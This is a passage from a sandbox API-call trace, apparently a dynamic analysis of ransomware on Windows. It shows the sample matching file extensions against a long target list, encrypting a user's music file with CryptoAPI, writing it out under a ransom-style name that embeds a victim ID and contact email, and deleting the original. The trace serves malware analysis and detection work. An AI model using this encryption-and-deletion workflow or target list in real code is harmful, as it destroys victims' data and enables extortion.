hm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp3") returned=".mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0194.412] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0194.412] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0194.412] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\hfo3g0iul3kxjhrxd0-o.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\hfo3g0iul3kxjhrxd0-o.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0194.417] ReadFile (in: hFile=0x390, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x1324a, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x189930*=0x1324a, lpOverlapped=0x0) returned 1
	[0194.423] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.423] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcaf78) returned 1
	[0194.425] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.425] CryptCreateHash (in: hProv=0xfcaf78, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0194.425] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.426] CryptHashData (hHash=0xfb91b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0194.426] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.426] CryptDeriveKey (in: hProv=0xfcaf78, Algid=0x6610, hBaseData=0xfb91b0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb8fb0) returned 1
	[0194.426] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.426] CryptEncrypt (in: hKey=0xfb8fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x1324a, dwBufLen=0x1324a | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x13250) returned 1
	[0194.428] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.428] RtlMoveMemory (in: Destination=0xff03d8, Source=0xfdd180, Length=0x1324a | out: Destination=0xff03d8) 
	[0194.428] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.429] CryptEncrypt (in: hKey=0xfb8fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff03d8*, pdwDataLen=0x1894dc*=0x1324a, dwBufLen=0x13250 | out: pbData=0xff03d8*, pdwDataLen=0x1894dc*=0x13250) returned 1
	[0194.429] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.429] CryptDestroyKey (hKey=0xfb8fb0) returned 1
	[0194.429] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.429] CryptDestroyHash (hHash=0xfb91b0) returned 1
	[0194.429] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.429] CryptReleaseContext (hProv=0xfcaf78, dwFlags=0x0) returned 1
	[0194.430] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.430] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0194.430] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.431] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0194.432] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\hfo3g0iul3kxjhrxd0-o.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 142
	[0194.432] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\hfo3g0iul3kxjhrxd0-o.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\hfo3g0iul3kxjhrxd0-o.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0194.433] WriteFile (in: hFile=0x39c, lpBuffer=0xff03d8*, nNumberOfBytesToWrite=0x13250, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xff03d8*, lpNumberOfBytesWritten=0x189938*=0x13250, lpOverlapped=0x0) returned 1
	[0194.439] CloseHandle (hObject=0x39c) returned 1
	[0194.439] CloseHandle (hObject=0x390) returned 1
	[0194.440] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\hfo3g0iul3kxjhrxd0-o.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\hfo3g0iul3kxjhrxd0-o.mp3")) returned 1
	[0194.447] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\hfo3g0iul3kxjhrxd0-o.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\hfo3g0iul3kxjhrxd0-o.mp3")) returned 0
	[0194.448] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb4a41e0, ftCreationTime.dwHighDateTime=0x1d975fa, ftLastAccessTime.dwLowDateTime=0xbfa82ce0, ftLastAccessTime.dwHighDateTime=0x1d9763e, ftLastWriteTime.dwLowDateTime=0xbfa82ce0, ftLastWriteTime.dwHighDateTime=0x1d9763e, nFileSizeHigh=0x0, nFileSizeLow=0xb383, dwReserved0=0x0, dwReserved1=0x0, cFileName="uf Ibx-MJ-z3DshsxTi.m4a", cAlternateFileName="UFIBX-~1.M4A")) returned 1
	[0194.448] lstrcmpW (lpString1="uf Ibx-MJ-z3DshsxTi.m4a", lpString2="..") returned 1
	[0194.448] lstrcmpW (lpString1="uf Ibx-MJ-z3DshsxTi.m4a", lpString2=".") returned 1
	[0194.448] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\"
	[0194.448] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\", lpString2="uf Ibx-MJ-z3DshsxTi.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\uf Ibx-MJ-z3DshsxTi.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\uf Ibx-MJ-z3DshsxTi.m4a"
	[0194.448] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\uf Ibx-MJ-z3DshsxTi.m4a") returned 99
	[0194.448] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0194.448] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\uf Ibx-MJ-z3DshsxTi.m4a", cchLength=0x63 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uf ibx-mj-z3dshsxti.m4a") returned 0x63
	[0194.448] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.470] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uf ibx-mj-z3dshsxti.m4a", lpSrch="help_decrypt_your_files") returned 0x0
	[0194.470] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uf ibx-mj-z3dshsxti.m4a" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uf ibx-mj-z3dshsxti.m4a") returned="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uf ibx-mj-z3dshsxti.m4a"
	[0194.470] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uf ibx-mj-z3dshsxti.m4a") returned 99
	[0194.470] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.470] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.471] StrStrW (lpFirst=".m4a", lpSrch=".") returned=".m4a"
	[0194.471] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.471] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".m4a") returned=".m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bt